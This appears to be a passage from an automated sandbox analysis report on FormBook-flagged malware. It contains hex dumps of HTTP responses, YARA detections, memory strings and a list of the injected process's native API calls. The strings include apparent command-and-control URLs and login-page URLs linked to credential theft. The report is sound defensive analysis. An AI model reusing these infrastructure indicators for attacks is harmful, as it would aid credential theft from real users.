af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:28:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:28:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 00:28:27 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: pcaui.exe, 00000008.00000002.4470482798.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003D2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005D70000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/px.js?ch=1
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005D70000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/px.js?ch=2
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005D70000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/sk-logabpstatus.php?a=WUhkRFEzRWdwaG9mYll1MUJoS1N3WXp6TVVHdWk4ZmQ2Z0
                      Source: pDqSqZXvqQcT.exe, 0000000A.00000002.4469698131.0000000004CBC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.questmatch.pro
                      Source: pDqSqZXvqQcT.exe, 0000000A.00000002.4469698131.0000000004CBC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.questmatch.pro/z3ox/
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033.
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033ym
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033I
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: pcaui.exe, 00000008.00000003.2366424762.0000000007B95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005BDE000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.00000000033BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005728000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000002F08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: W3MzrFzSF0.exeString found in binary or memory: https://www.mgm.gov.tr/?il=manisa
                      Source: W3MzrFzSF0.exeString found in binary or memory: https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmb
                      Source: W3MzrFzSF0.exeString found in binary or memory: https://www.trtworld.com/#frmActiveBrowsers

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4469698131.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4467776927.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2173692414.00000000083A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0042C893 NtClose,6_2_0042C893
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_058C2DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_058C2C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2B60 NtClose,LdrInitializeThunk,6_2_058C2B60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C35C0 NtCreateMutant,LdrInitializeThunk,6_2_058C35C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C4650 NtSuspendThread,6_2_058C4650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C4340 NtSetContextThread,6_2_058C4340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2DB0 NtEnumerateKey,6_2_058C2DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2DD0 NtDelayExecution,6_2_058C2DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2D00 NtSetInformationFile,6_2_058C2D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2D10 NtMapViewOfSection,6_2_058C2D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2D30 NtUnmapViewOfSection,6_2_058C2D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2CA0 NtQueryInformationToken,6_2_058C2CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2CC0 NtQueryVirtualMemory,6_2_058C2CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2CF0 NtOpenProcess,6_2_058C2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2C00 NtQueryInformationProcess,6_2_058C2C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2C60 NtCreateKey,6_2_058C2C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2F90 NtProtectVirtualMemory,6_2_058C2F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2FA0 NtQuerySection,6_2_058C2FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2FB0 NtResumeThread,6_2_058C2FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2FE0 NtCreateFile,6_2_058C2FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2F30 NtCreateSection,6_2_058C2F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2F60 NtCreateProcessEx,6_2_058C2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2E80 NtReadVirtualMemory,6_2_058C2E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2EA0 NtAdjustPrivilegesToken,6_2_058C2EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2EE0 NtQueueApcThread,6_2_058C2EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2E30 NtWriteVirtualMemory,6_2_058C2E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2B80 NtQueryInformationFile,6_2_058C2B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2BA0 NtEnumerateValueKey,6_2_058C2BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2BE0 NtQueryValueKey,6_2_058C2BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2BF0 NtAllocateVirtualMemory,6_2_058C2BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2AB0 NtWaitForSingleObject,6_2_058C2AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2AD0 NtReadFile,6_2_058C2AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2AF0 NtWriteFile,6_2_058C2AF0
